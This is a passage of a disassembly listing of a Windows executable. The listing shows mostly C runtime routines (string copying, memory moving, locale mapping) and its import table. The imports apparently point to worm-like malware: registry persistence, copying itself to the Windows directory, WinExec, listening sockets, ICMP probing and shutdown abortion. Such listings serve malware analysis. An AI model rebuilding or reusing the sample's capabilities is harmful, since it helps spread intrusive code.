mov esi, dword_405054
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; GetProcAddress
test eax, eax
mov dword_4070C0, eax
jz short loc_404698
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; GetProcAddress
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_4070C4, eax
call esi ; GetProcAddress
mov dword_4070C8, eax
loc_404662: ; CODE XREF: sub_404613+B�j
mov eax, dword_4070C4
test eax, eax
jz short loc_404681
call eax ; GetActiveWindow
mov ebx, eax
test ebx, ebx
jz short loc_404681
mov eax, dword_4070C8
test eax, eax
jz short loc_404681
push ebx
call eax ; GetLastActivePopup
mov ebx, eax
loc_404681: ; CODE XREF: sub_404613+56�j
; sub_404613+5E�j ...
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call dword_4070C0 ; MessageBoxA
loc_404694: ; CODE XREF: sub_404613+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_404698: ; CODE XREF: sub_404613+1C�j
; sub_404613+33�j
xor eax, eax
jmp short loc_404694
sub_404613 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4046A0 proc near ; CODE XREF: sub_403669+C5�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_404723
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_4046C4
shr ecx, 2
jnz short loc_404731
jmp short loc_4046E5
; ---------------------------------------------------------------------------
loc_4046C4: ; CODE XREF: sub_4046A0+1B�j
; sub_4046A0+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_4046F2
test al, al
jz short loc_4046FA
test esi, 3
jnz short loc_4046C4
mov ebx, ecx
shr ecx, 2
jnz short loc_404731
loc_4046E0: ; CODE XREF: sub_4046A0+8F�j
and ebx, 3
jz short loc_4046F2
loc_4046E5: ; CODE XREF: sub_4046A0+22�j
; sub_4046A0+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_40471E
dec ebx
jnz short loc_4046E5
loc_4046F2: ; CODE XREF: sub_4046A0+2B�j
; sub_4046A0+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_4046FA: ; CODE XREF: sub_4046A0+2F�j
test edi, 3
jz short loc_404714
loc_404702: ; CODE XREF: sub_4046A0+72�j
mov [edi], al
inc edi
dec ecx
jz loc_404796
test edi, 3
jnz short loc_404702
loc_404714: ; CODE XREF: sub_4046A0+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_404787
loc_40471B: ; CODE XREF: sub_4046A0+7F�j
; sub_4046A0+F4�j
mov [edi], al
inc edi
loc_40471E: ; CODE XREF: sub_4046A0+4D�j
dec ebx
jnz short loc_40471B
pop ebx
pop esi
loc_404723: ; CODE XREF: sub_4046A0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_404729: ; CODE XREF: sub_4046A0+A9�j
; sub_4046A0+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_4046E0
loc_404731: ; CODE XREF: sub_4046A0+20�j
; sub_4046A0+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_404729
test dl, dl
jz short loc_40477B
test dh, dh
jz short loc_404771
test edx, 0FF0000h
jz short loc_404767
test edx, 0FF000000h
jnz short loc_404729
mov [edi], edx
jmp short loc_40477F
; ---------------------------------------------------------------------------
loc_404767: ; CODE XREF: sub_4046A0+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_40477F
; ---------------------------------------------------------------------------
loc_404771: ; CODE XREF: sub_4046A0+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_40477F
; ---------------------------------------------------------------------------
loc_40477B: ; CODE XREF: sub_4046A0+AD�j
xor edx, edx
mov [edi], edx
loc_40477F: ; CODE XREF: sub_4046A0+C5�j
; sub_4046A0+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_404791
loc_404787: ; CODE XREF: sub_4046A0+79�j
xor eax, eax
loc_404789: ; CODE XREF: sub_4046A0+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_404789
loc_404791: ; CODE XREF: sub_4046A0+E5�j
and ebx, 3
jnz short loc_40471B
loc_404796: ; CODE XREF: sub_4046A0+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_4046A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40479E proc near ; CODE XREF: sub_403B86+BE�p
; sub_403B86+E6�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405488
push offset sub_403558
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp dword_4070EC, edi
jnz short loc_404814
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_40543C
mov esi, 100h
push esi
push edi
call dword_40509C ; LCMapStringW
test eax, eax
jz short loc_4047F2
mov dword_4070EC, ebx
jmp short loc_404814
; ---------------------------------------------------------------------------
loc_4047F2: ; CODE XREF: sub_40479E+4A�j
push edi
push edi
push ebx
push offset dword_406F48
push esi
push edi
call dword_405098 ; LCMapStringA
test eax, eax
jz loc_40492C
mov dword_4070EC, 2
loc_404814: ; CODE XREF: sub_40479E+2E�j
; sub_40479E+52�j
cmp [ebp+arg_C], edi
jle short loc_404829
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4049C2
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_404829: ; CODE XREF: sub_40479E+79�j
mov eax, dword_4070EC
cmp eax, 2
jnz short loc_404850
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_405098 ; LCMapStringA
jmp loc_40492E
; ---------------------------------------------------------------------------
loc_404850: ; CODE XREF: sub_40479E+93�j
cmp eax, 1
jnz loc_40492C
cmp [ebp+arg_18], edi
jnz short loc_404866
mov eax, dword_4070E4
mov [ebp+arg_18], eax
loc_404866: ; CODE XREF: sub_40479E+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call dword_405078 ; MultiByteToWideChar
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_40492C
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_402670
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4048C1
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_4048C1: ; CODE XREF: sub_40479E+10E�j
cmp [ebp+var_24], edi
jz short loc_40492C
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call dword_405078 ; MultiByteToWideChar
test eax, eax
jz short loc_40492C
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40509C ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_40492C
test byte ptr [ebp+arg_4+1], 4
jz short loc_404940
cmp [ebp+arg_14], edi
jz loc_4049BB
cmp esi, [ebp+arg_14]
jg short loc_40492C
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40509C ; LCMapStringW
test eax, eax
jnz loc_4049BB
loc_40492C: ; CODE XREF: sub_40479E+66�j
; sub_40479E+B5�j ...
xor eax, eax
loc_40492E: ; CODE XREF: sub_40479E+AD�j
; sub_40479E+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_404940: ; CODE XREF: sub_40479E+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_402670
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_404974
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_404974: ; CODE XREF: sub_40479E+1C2�j
cmp ebx, edi
jz short loc_40492C
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40509C ; LCMapStringW
test eax, eax
jz short loc_40492C
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_40499B
push edi
push edi
jmp short loc_4049A1
; ---------------------------------------------------------------------------
loc_40499B: ; CODE XREF: sub_40479E+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_4049A1: ; CODE XREF: sub_40479E+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call dword_4050B0 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_40492C
loc_4049BB: ; CODE XREF: sub_40479E+165�j
; sub_40479E+188�j
mov eax, esi
jmp loc_40492E
sub_40479E endp
; =============== S U B R O U T I N E =======================================
sub_4049C2 proc near ; CODE XREF: sub_40479E+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_4049DF
loc_4049D2: ; CODE XREF: sub_4049C2+1B�j
cmp byte ptr [eax], 0
jz short loc_4049DF
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_4049D2
loc_4049DF: ; CODE XREF: sub_4049C2+E�j
; sub_4049C2+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_4049EA
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_4049EA: ; CODE XREF: sub_4049C2+21�j
mov eax, edx
retn
sub_4049C2 endp
; =============== S U B R O U T I N E =======================================
sub_4049ED proc near ; CODE XREF: sub_403D68+1F�p
arg_0 = dword ptr 4
mov eax, dword_4070F4
test eax, eax
jz short loc_404A05
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_404A05
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_404A05: ; CODE XREF: sub_4049ED+7�j
; sub_4049ED+12�j
xor eax, eax
retn
sub_4049ED endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404A10 proc near ; CODE XREF: sub_403E33+2EE�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_404A30
cmp edi, eax
jb loc_404BA8
loc_404A30: ; CODE XREF: sub_404A10+16�j
test edi, 3
jnz short loc_404A4C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_404A6C
rep movsd
jmp off_404B58[edx*4]
; ---------------------------------------------------------------------------
loc_404A4C: ; CODE XREF: sub_404A10+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_404A64
and eax, 3
add ecx, eax
jmp dword ptr loc_404A6C+4[eax*4]
; ---------------------------------------------------------------------------
loc_404A64: ; CODE XREF: sub_404A10+46�j
jmp dword ptr loc_404B68[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_404A6C: ; CODE XREF: sub_404A10+31�j
; sub_404A10+8E�j ...
jmp off_404AEC[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_404A80
dd offset loc_404AAC
dd offset loc_404AD0
; ---------------------------------------------------------------------------
loc_404A80: ; DATA XREF: sub_404A10+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_404A6C
rep movsd
jmp off_404B58[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_404AAC: ; DATA XREF: sub_404A10+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_404A6C
rep movsd
jmp off_404B58[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404AD0: ; DATA XREF: sub_404A10+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_404A6C
rep movsd
jmp off_404B58[edx*4]
; ---------------------------------------------------------------------------
align 4
off_404AEC dd offset loc_404B4F ; DATA XREF: sub_404A10:loc_404A6C�r
dd offset loc_404B3C
dd offset loc_404B34
dd offset loc_404B2C
dd offset loc_404B24
dd offset loc_404B1C
dd offset loc_404B14
dd offset loc_404B0C
; ---------------------------------------------------------------------------
loc_404B0C: ; CODE XREF: sub_404A10:loc_404A6C�j
; DATA XREF: sub_404A10+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_404B14: ; CODE XREF: sub_404A10:loc_404A6C�j
; DATA XREF: sub_404A10+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_404B1C: ; CODE XREF: sub_404A10:loc_404A6C�j
; DATA XREF: sub_404A10+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_404B24: ; CODE XREF: sub_404A10:loc_404A6C�j
; DATA XREF: sub_404A10+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_404B2C: ; CODE XREF: sub_404A10:loc_404A6C�j
; DATA XREF: sub_404A10+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_404B34: ; CODE XREF: sub_404A10:loc_404A6C�j
; DATA XREF: sub_404A10+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_404B3C: ; CODE XREF: sub_404A10:loc_404A6C�j
; DATA XREF: sub_404A10+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_404B4F: ; CODE XREF: sub_404A10:loc_404A6C�j
; DATA XREF: sub_404A10:off_404AEC�o
jmp off_404B58[edx*4]
; ---------------------------------------------------------------------------
align 4
off_404B58 dd offset loc_404B68 ; DATA XREF: sub_404A10+35�r
; sub_404A10+92�r ...
dd offset loc_404B70
dd offset loc_404B7C
dd offset loc_404B90
; ---------------------------------------------------------------------------
loc_404B68: ; CODE XREF: sub_404A10+35�j
; sub_404A10+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_404B70: ; CODE XREF: sub_404A10+35�j
; sub_404A10+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404B7C: ; CODE XREF: sub_404A10+35�j
; sub_404A10+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_404B90: ; CODE XREF: sub_404A10+35�j
; sub_404A10+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404BA8: ; CODE XREF: sub_404A10+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_404BDC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_404BD0
std
rep movsd
cld
jmp off_404CF0[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404BD0: ; CODE XREF: sub_404A10+1B1�j
; sub_404A10+208�j ...
neg ecx
jmp off_404CA0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_404BDC: ; CODE XREF: sub_404A10+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_404BF4
and eax, 3
sub ecx, eax
jmp dword ptr loc_404BF4+4[eax*4]
; ---------------------------------------------------------------------------
loc_404BF4: ; CODE XREF: sub_404A10+1D6�j
; DATA XREF: sub_404A10+1DD�r
jmp off_404CF0[ecx*4]
; ---------------------------------------------------------------------------
align 4
or [eax+eax*2+0], cl
sub [eax+eax*2+0], cl
push eax
dec esp
inc eax
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_404BD0
std
rep movsd
cld
jmp off_404CF0[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_404BD0
std
rep movsd
cld
jmp off_404CF0[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_404BD0
std
rep movsd
cld
jmp off_404CF0[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_404CA4
dd offset loc_404CAC
dd offset loc_404CB4
dd offset loc_404CBC
dd offset loc_404CC4
dd offset loc_404CCC
dd offset loc_404CD4
off_404CA0 dd offset loc_404CE7 ; DATA XREF: sub_404A10+1C2�r
; ---------------------------------------------------------------------------
loc_404CA4: ; DATA XREF: sub_404A10+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_404CAC: ; DATA XREF: sub_404A10+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_404CB4: ; DATA XREF: sub_404A10+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_404CBC: ; DATA XREF: sub_404A10+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_404CC4: ; DATA XREF: sub_404A10+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_404CCC: ; DATA XREF: sub_404A10+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_404CD4: ; DATA XREF: sub_404A10+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_404CE7: ; CODE XREF: sub_404A10+1C2�j
; DATA XREF: sub_404A10:off_404CA0�o
jmp off_404CF0[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_404CF0 dd offset loc_404D00 ; DATA XREF: sub_404A10+1B7�r
; sub_404A10:loc_404BF4�r ...
dd offset loc_404D08
dd offset loc_404D18
dd offset loc_404D2C
; ---------------------------------------------------------------------------
loc_404D00: ; CODE XREF: sub_404A10+1B7�j
; sub_404A10:loc_404BF4�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404D08: ; CODE XREF: sub_404A10+1B7�j
; sub_404A10:loc_404BF4�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404D18: ; CODE XREF: sub_404A10+1B7�j
; sub_404A10:loc_404BF4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404D2C: ; CODE XREF: sub_404A10+1B7�j
; sub_404A10:loc_404BF4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_404A10 endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404D46 proc near ; CODE XREF: sub_401B08+33�p
jmp dword_405134
sub_404D46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404D4C proc near ; CODE XREF: sub_401B08+24�p
jmp dword_40512C
sub_404D4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404D52 proc near ; CODE XREF: sub_401B08+7�p
jmp dword_405130
sub_404D52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404D58 proc near ; CODE XREF: sub_403460+13�p
jmp dword_405080
sub_404D58 endp
; ---------------------------------------------------------------------------
align 10h
dd 0A8h dup(0)
dword_405000 dd 77DFC41Bh ; resolved to->ADVAPI32.RegOpenKeyAdword_405004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_405008 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKeydword_40500C dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownA dd 0
dword_405014 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryAdword_405018 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_40127D+8F�r ...
dword_40501C dd 7C834E64h ; resolved to->KERNEL32._lclose ; sub_401B46+2AB�r
dword_405020 dd 7C838AE7h ; resolved to->KERNEL32._lwritedword_405024 dd 7C8365A5h ; resolved to->KERNEL32._lcreatdword_405028 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_40159E+4D0�r ...
dword_40502C dd 7C8353CEh ; resolved to->KERNEL32._lreaddword_405030 dd 7C85E830h ; resolved to->KERNEL32._lopendword_405034 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_401F2E+13C�r ...
dword_405038 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_4020C8:loc_402134�r
dword_40503C dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_405040 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_405044 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_405048 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_40504C dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_405050 dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_405054 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_405058 dd 7C9179FDh ; resolved to->NTDLL.RtlReAllocateHeapdword_40505C dd 7C809A51h ; resolved to->KERNEL32.VirtualAlloc ; sub_404518+51�r
dword_405060 dd 7C9105D4h ; resolved to->NTDLL.RtlAllocateHeap ; sub_403DCA+D�r ...
dword_405064 dd 7C8127A7h ; resolved to->KERNEL32.GetOEMCPdword_405068 dd 7C809915h ; resolved to->KERNEL32.GetACPdword_40506C dd 7C812E76h ; resolved to->KERNEL32.GetCPInfo ; sub_403B86+14�r
dword_405070 dd 7C80A490h ; resolved to->KERNEL32.GetStringTypeW ; sub_4037BC+12D�r
dword_405074 dd 7C838A0Ch ; resolved to->KERNEL32.GetStringTypeA ; sub_4037BC+8D�r
dword_405078 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChar ; sub_4037BC+11B�r ...
dword_40507C dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_405080 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_405084 dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeap ; sub_403E33+2C4�r ...
dword_405088 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_40508C dd 7C812BB6h ; resolved to->KERNEL32.HeapCreatedword_405090 dd 7C810EF8h ; resolved to->KERNEL32.HeapDestroydword_405094 dd 7C810E51h ; resolved to->KERNEL32.GetFileType ; sub_403277+166�r
dword_405098 dd 7C838DE8h ; resolved to->KERNEL32.LCMapStringA ; sub_40479E+A7�r
dword_40509C dd 7C80CCA8h ; resolved to->KERNEL32.LCMapStringW ; sub_40479E+14D�r ...
dword_4050A0 dd 7C812F39h ; resolved to->KERNEL32.GetStdHandle ; sub_403669+143�r
dword_4050A4 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCountdword_4050A8 dd 7C812F08h ; resolved to->KERNEL32.GetEnvironmentStringsWdword_4050AC dd 7C81CF5Bh ; resolved to->KERNEL32.GetEnvironmentStringsA ; sub_403145+E1�r
dword_4050B0 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiByte ; sub_40479E+20D�r
dword_4050B4 dd 7C814AE7h ; resolved to->KERNEL32.FreeEnvironmentStringsWdword_4050B8 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_4050BC dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoA ; sub_403277+59�r
dword_4050C0 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_4050C4 dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_4050C8 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_402BB0+91�r
dword_4050CC dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_4050D0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_4050D4 dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilterdword_4050D8 dd 7C81DF77h ; resolved to->KERNEL32.FreeEnvironmentStringsA align 10h
dword_4050E0 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_40127D+B7�r ...
align 8
dword_4050E8 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; sub_401F2E+17F�r
align 10h
dword_4050F0 dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_4050F4 dd 71AB3E00h ; resolved to->WS2_32.binddword_4050F8 dd 71AB88D3h ; resolved to->WS2_32.listendword_4050FC dd 71AC1028h ; resolved to->WS2_32.acceptdword_405100 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_40159E+2DD�r ...
dword_405104 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_401398+151�r ...
dword_405108 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_40127D+27�r ...
dword_40510C dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_40127D+51�r ...
dword_405110 dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_40127D+6C�r ...
dword_405114 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_40127D+10F�r ...
dword_405118 dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_40511C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoadword_405120 dd 71AB2BF4h ; resolved to->WS2_32.inet_addr ; sub_4011D5+7�r ...
dword_405124 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_4011D5+1E�r ...
dd 0
dword_40512C dd 76D64B79h ; resolved to->IPHLPAPI.IcmpSendEchodword_405130 dd 76D64D5Eh ; resolved to->IPHLPAPI.IcmpCreateFiledword_405134 dd 76D64D33h ; resolved to->IPHLPAPI.IcmpCloseHandle align 10h
dword_405140 dd 0FFFFFFFFh, 4029B5h, 4029C9h, 746E7572h, 20656D69h
; DATA XREF: .text:004028E3�o
dd 6F727265h, 2072h, 0A0Dh, 534F4C54h, 72652053h, 0D726F72h
dd 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 10h
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 10h
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
